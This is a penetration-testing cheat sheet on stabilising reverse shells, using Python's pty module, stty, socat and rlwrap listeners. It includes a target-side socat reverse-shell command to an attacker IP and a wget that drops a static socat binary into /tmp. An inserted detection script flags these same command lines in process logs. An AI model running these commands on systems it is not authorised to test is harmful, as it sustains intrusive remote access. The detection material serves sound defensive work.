Upgrading Shells
A list of methods to upgrade shells to fully interactive TTYs!
Python PTY Upgrade
Run the following command in the limited shell:
python -c 'import pty; pty.spawn("/bin/bash")'
The shell will now look prettier and have some TTY capabilities. To make it fully interactive, use the following command to give access to terminal commands such as clear:
export TERM=xterm
Finally, background the shell with [Ctrl-Z], then run the following commands on the attack box. The first puts the attack box's terminal into raw mode and turns off its local echo, so that keystrokes such as Tab (autocomplete) and the arrow keys are passed through to the remote shell. The second brings the shell back to the foreground.
stty raw -echo
fg
If this works, the result is a fully interactive TTY shell. Sometimes it is also useful to set the terminal size. Do this by checking the attack box's values and then copying them over with the following:
# Attack box - gives row and column length
stty -a
# Shell
stty rows $ROW_LENGTH
stty cols $COL_LENGTH
Socat Upgrade
This method uses socat to open a second reverse shell that is fully interactive.
On the attack box, create a listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
On the target, launch a reverse shell:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:4444
If socat is missing, a statically compiled binary can be downloaded with the following commands:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
chmod +x /tmp/socat
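Seen from the target host, the Python and socat steps above leave distinctive process command lines. The following is an added example, not part of the original page: a POSIX shell filter that labels those command lines in process-creation records. The record layout (host, pid, command line), the label names and the sample records are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag the target-side commands from this page in process
# command-line telemetry. Record layout and label names are assumptions.

# classify_cmdline CMDLINE -> prints a label, or "none"
classify_cmdline() {
    cmd=$1
    # Python one-liner that spawns a shell on a new PTY (any python version)
    if printf '%s\n' "$cmd" |
        grep -Eq 'python[0-9.]*[[:space:]]+-c[[:space:]].*pty\.spawn'; then
        echo pty_spawn
    # socat wiring a command to a PTY and an outbound TCP peer
    # (socat address keywords are case-insensitive, hence -i)
    elif printf '%s\n' "$cmd" | grep -Eiq 'socat[[:space:]].*exec:.*pty' &&
         printf '%s\n' "$cmd" | grep -Eiq 'socat[[:space:]].*tcp[46]?(-connect)?:'; then
        echo socat_pty_shell
    # a file named socat written to, or run from, a world-writable temp dir
    elif printf '%s\n' "$cmd" | grep -Eq '(/tmp|/dev/shm|/var/tmp)/socat'; then
        echo socat_in_tmp
    else
        echo none
    fi
}

# scan_log: read "<host> <pid> <command line>" records on stdin and print
# "<label> <host> <pid>" for every record that matches a pattern
scan_log() {
    while read -r host pid cmdline; do
        label=$(classify_cmdline "$cmdline")
        [ "$label" = none ] || echo "$label $host $pid"
    done
}

# Constructed sample records (not real telemetry); shell quoting is already
# removed, as it would be in exec-level logging
sample_log() {
    cat <<'EOF'
web01 4121 python -c import pty; pty.spawn("/bin/bash")
web01 4188 wget -q https://example.invalid/socat -O /tmp/socat
web01 4190 chmod +x /tmp/socat
web01 4195 /tmp/socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:192.0.2.10:4444
db02 977 socat tcp-listen:8080,fork tcp:10.0.0.9:80
db02 1002 python3 -c import sys; print(sys.version)
EOF
}

sample_log | scan_log
```

The plain socat port forwarder and the harmless python one-liner on db02 are not flagged, which shows why the socat rule requires both exec: with pty and an outbound tcp: address.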
RLWrap Upgrade
The program rlwrap gives access to history, tab autocompletion, and the arrow keys immediately upon receiving a shell. Sometimes, manual stabilization must still be used for interrupts like [Ctrl-C] to work.
rlwrap nc -nvlp $PORT
Often, this is set up as an alias that replaces the usual listener command:
alias listener='sudo rlwrap nc -nvlp'